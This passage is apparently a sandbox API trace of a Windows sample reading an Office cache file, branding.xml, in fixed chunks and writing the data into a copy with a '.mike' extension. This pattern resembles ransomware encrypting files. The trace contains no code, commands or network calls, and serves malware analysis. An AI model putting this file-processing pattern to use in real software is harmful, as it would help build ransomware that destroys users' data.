lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0041.008] ReadFile (in: hFile=0x264, lpBuffer=0x21ea524, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21ea524*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.009] CloseHandle (hObject=0x264) returned 1 [0041.009] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.009] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.009] GetFileType (hFile=0x264) returned 0x1 [0041.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.009] GetFileType (hFile=0x264) returned 0x1 [0041.009] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0041.010] WriteFile (in: hFile=0x264, lpBuffer=0x21f4a8c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21f4a8c*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.010] CloseHandle (hObject=0x264) returned 1 [0041.011] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.011] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.011] GetFileType (hFile=0x264) returned 0x1 [0041.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.011] GetFileType (hFile=0x264) returned 0x1 [0041.011] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x5000 [0041.011] ReadFile (in: hFile=0x264, lpBuffer=0x21f74fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21f74fc*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.011] CloseHandle (hObject=0x264) returned 1 [0041.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.012] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.012] GetFileType (hFile=0x264) returned 0x1 [0041.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.012] GetFileType (hFile=0x264) returned 0x1 [0041.012] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x5220 [0041.012] WriteFile (in: hFile=0x264, lpBuffer=0x2201a64*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2201a64*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.012] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.013] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.013] GetFileType (hFile=0x264) returned 0x1 [0041.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.013] GetFileType (hFile=0x264) returned 0x1 [0041.013] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x7800 [0041.013] ReadFile (in: hFile=0x264, lpBuffer=0x22044d4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22044d4*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.013] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.014] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.014] GetFileType (hFile=0x264) returned 0x1 [0041.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.014] GetFileType (hFile=0x264) returned 0x1 [0041.014] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x7a20 [0041.015] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.015] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.015] GetFileType (hFile=0x264) returned 0x1 [0041.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.015] GetFileType (hFile=0x264) returned 0x1 [0041.015] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0xa000 [0041.015] ReadFile (in: hFile=0x264, lpBuffer=0x22114ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22114ac*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.016] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.016] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.016] GetFileType (hFile=0x264) returned 0x1 [0041.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.016] GetFileType (hFile=0x264) returned 0x1 [0041.016] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xa220 [0041.017] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.017] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.017] GetFileType (hFile=0x264) returned 0x1 [0041.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.017] GetFileType (hFile=0x264) returned 0x1 [0041.017] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0xc800 [0041.017] ReadFile (in: hFile=0x264, lpBuffer=0x221e484, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x221e484*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.018] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.018] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.018] GetFileType (hFile=0x264) returned 0x1 [0041.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.018] GetFileType (hFile=0x264) returned 0x1 [0041.018] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xca20 [0041.018] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.018] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.018] GetFileType (hFile=0x264) returned 0x1 [0041.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.018] GetFileType (hFile=0x264) returned 0x1 [0041.018] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0xf000 [0041.019] ReadFile (in: hFile=0x264, lpBuffer=0x222b45c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x222b45c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.019] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.019] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.019] GetFileType (hFile=0x264) returned 0x1 [0041.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.019] GetFileType (hFile=0x264) returned 0x1 [0041.020] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xf220 [0041.020] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.020] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.020] GetFileType (hFile=0x264) returned 0x1 [0041.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.020] GetFileType (hFile=0x264) returned 0x1 [0041.020] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x11800 [0041.020] ReadFile (in: hFile=0x264, lpBuffer=0x2238434, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2238434*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.021] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.021] GetFileType (hFile=0x264) returned 0x1 [0041.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.021] GetFileType (hFile=0x264) returned 0x1 [0041.021] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x11a20 [0041.021] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.022] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.022] GetFileType (hFile=0x264) returned 0x1 [0041.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.022] GetFileType (hFile=0x264) returned 0x1 [0041.022] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x14000 [0041.022] ReadFile (in: hFile=0x264, lpBuffer=0x224540c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x224540c*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.022] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.023] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.023] GetFileType (hFile=0x264) returned 0x1 [0041.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.023] GetFileType (hFile=0x264) returned 0x1 [0041.023] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x14220 [0041.023] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.023] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.023] GetFileType (hFile=0x264) returned 0x1 [0041.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.023] GetFileType (hFile=0x264) returned 0x1 [0041.023] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x16800 [0041.023] ReadFile (in: hFile=0x264, lpBuffer=0x22523e4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x22523e4*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.024] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.024] GetFileType (hFile=0x264) returned 0x1 [0041.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.024] GetFileType (hFile=0x264) returned 0x1 [0041.024] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x16a20 [0041.025] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.025] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.025] GetFileType (hFile=0x264) returned 0x1 [0041.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.025] GetFileType (hFile=0x264) returned 0x1 [0041.025] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x19000 [0041.025] ReadFile (in: hFile=0x264, lpBuffer=0x225f3bc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x225f3bc*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.026] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.026] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.026] GetFileType (hFile=0x264) returned 0x1 [0041.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.026] GetFileType (hFile=0x264) returned 0x1 [0041.026] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x19220 [0041.026] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.026] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.027] GetFileType (hFile=0x264) returned 0x1 [0041.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.027] GetFileType (hFile=0x264) returned 0x1 [0041.027] SetFilePointer (in: 